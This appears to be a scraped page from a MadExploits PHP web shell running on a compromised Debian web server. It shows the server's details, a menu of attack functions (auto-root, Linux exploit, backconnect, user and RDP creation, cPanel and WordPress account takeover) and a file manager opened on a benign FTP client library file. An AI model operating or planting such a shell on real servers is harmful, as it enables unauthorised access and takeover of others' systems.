Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.133.109.141
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
lib /
filemanager /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
FtpClient.php
24.65
KB
-rw-r--r--
FtpException.php
546
B
-rw-r--r--
FtpWrapper.php
5.22
KB
-rw-r--r--
Response.php
9.76
KB
-rw-r--r--
ftp_class.php
2.1
KB
-rw-r--r--
mime_type_lib.php
11.87
KB
-rw-r--r--
php_image_magician.php
96.09
KB
-rw-r--r--
utils.php
23.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FtpException.php
<?php /* * This file is part of the `nicolab/php-ftp-client` package. * * (c) Nicolas Tallefourtane <dev@nicolab.net> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Nicolas Tallefourtane http://nicolab.net */ namespace FtpClient; /** * The FtpException class. * Exception thrown if an error on runtime of the FTP client occurs. * @inheritDoc * @author Nicolas Tallefourtane <dev@nicolab.net> */ class FtpException extends \Exception {}
Close